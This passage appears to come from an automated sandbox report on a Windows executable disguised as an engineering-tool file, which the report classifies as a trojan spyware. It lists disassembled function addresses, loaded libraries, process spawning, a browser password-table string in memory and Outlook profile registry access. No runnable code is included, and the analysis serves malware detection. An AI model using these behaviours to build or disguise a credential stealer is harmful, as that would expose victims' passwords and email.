            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8704011_2_38C87040
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8C64011_2_38C8C640
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8F14711_2_38C8F147
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C83B5811_2_38C83B58
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8F15811_2_38C8F158
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8AE5911_2_38C8AE59
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C81B5E11_2_38C81B5E
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8D95F11_2_38C8D95F
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8C65011_2_38C8C650
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8095011_2_38C80950
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8835011_2_38C88350
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C81B6811_2_38C81B68
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8AE6811_2_38C8AE68
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8446811_2_38C84468
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C86B6811_2_38C86B68
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8126F11_2_38C8126F
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8966F11_2_38C8966F
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8096011_2_38C80960
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8836011_2_38C88360
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8447811_2_38C84478
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C86B7811_2_38C86B78
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8247811_2_38C82478
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8C17811_2_38C8C178
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8490811_2_38C84908
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8750811_2_38C87508
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8CB0911_2_38C8CB09
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8E30011_2_38C8E300
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8A00011_2_38C8A000
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8290711_2_38C82907
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8291811_2_38C82918
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8CB1811_2_38C8CB18
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8881811_2_38C88818
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8171011_2_38C81710
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8A01011_2_38C8A010
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8F61011_2_38C8F610
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8001211_2_38C80012
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8522811_2_38C85228
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8882811_2_38C88828
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8322811_2_38C83228
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8DE2911_2_38C8DE29
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8F62011_2_38C8F620
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8B32111_2_38C8B321
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8522211_2_38C85222
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8323811_2_38C83238
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8DE3811_2_38C8DE38
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C85B3811_2_38C85B38
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C89B3811_2_38C89B38
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8B33011_2_38C8B330
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8703111_2_38C87031
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38CAF66811_2_38CAF668
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38CA182811_2_38CA1828
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38CAF98811_2_38CAF988
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38CA7FA811_2_38CA7FA8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38CAB4C811_2_38CAB4C8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38CA82C811_2_38CA82C8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38CAE6C811_2_38CAE6C8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38CA82C011_2_38CA82C0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38CAD0E811_2_38CAD0E8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38CA9EE811_2_38CA9EE8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38CA04F811_2_38CA04F8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38CABAF911_2_38CABAF9
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38CAECF911_2_38CAECF9
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38CA88FE11_2_38CA88FE
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38CAE08811_2_38CAE088
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38CAAE8811_2_38CAAE88
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38CA0E9811_2_38CA0E98
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38CA989811_2_38CA9898
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38CACA9811_2_38CACA98
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38CA0E9211_2_38CA0E92
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38CAFCA811_2_38CAFCA8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38CACAA811_2_38CACAA8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38CA98A811_2_38CA98A8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38CAE6BB11_2_38CAE6BB
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38CAA84811_2_38CAA848
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38CADA4811_2_38CADA48
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38CA004011_2_38CA0040
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38CADA4011_2_38CADA40
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38CA925811_2_38CA9258
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38CAC45711_2_38CAC457
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38CAC46811_2_38CAC468
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: String function: 00402A3A appears 52 times
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamefreedoms solitrringenes.exeDVarFileInfo$ vs SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5974467463.0000000070CBB000.00000020.00000001.01000000.0000000C.sdmpBinary or memory string: OriginalFilenameSystem.Windows.Forms.dllT vs SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamefreedoms solitrringenes.exeDVarFileInfo$ vs SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/9@5/5
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 0_2_004030D9 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004030D9
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_004030D9 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,11_2_004030D9
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 0_2_00404320 GetDlgItem,SetWindowTextA,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,LdrInitializeThunk,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404320
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 0_2_0040205E LdrInitializeThunk,CoCreateInstance,MultiByteToWideChar,LdrInitializeThunk,0_2_0040205E
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeFile created: C:\Users\user\faldenJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeMutant created: NULL
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeFile created: C:\Users\user\AppData\Local\Temp\nss2FBA.tmpJump to behavior
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036406000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeReversingLabs: Detection: 55%
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeFile read: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe "C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe"
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeProcess created: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe "C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe"
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeProcess created: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe "C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe"Jump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeFile written: C:\Users\user\hanknsordet.iniJump to behavior
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
